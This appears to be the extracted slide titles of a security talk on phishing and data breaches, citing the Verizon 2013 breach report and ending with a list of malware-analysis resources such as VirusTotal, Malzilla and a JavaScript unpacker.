  • Tangent #3 – Game Over?Tangent #3 – Game Over? Source: XKCD
  • Case Study – 2 weeks later…Case Study – 2 weeks later…
  • A breach timelineA breach timeline Source: Verizon 2013 Data Breach Information Report
  • Is this isolated?Is this isolated?
  • But do people actually click?But do people actually click? Source: Verizon 2013 Data Breach Information ReportSource: Verizon 2013 Data Breach Information Report
  • The “best” PhishThe “best” Phish
  • ResourcesResources Socat: http://www.dest-unreach.org/socat/ VirusTotal: http://www.virustotal.com/ Revolo: http://www.kahusecurity.com/ Malzilla: http://malzilla.sourceforge.net/ curl/wget: Your local package management tool  Malware Tracker: http://malwaretracker.com/ Javascript Beautifier: http://jsbeautifier.org/ Javascript Unpack: http://jsunpack.jeek.org DBIR: http://www.verizonenterprise.com/DBIR/2013/
  • Thank you for your time.Thank you for your time. Any Questions?Any Questions?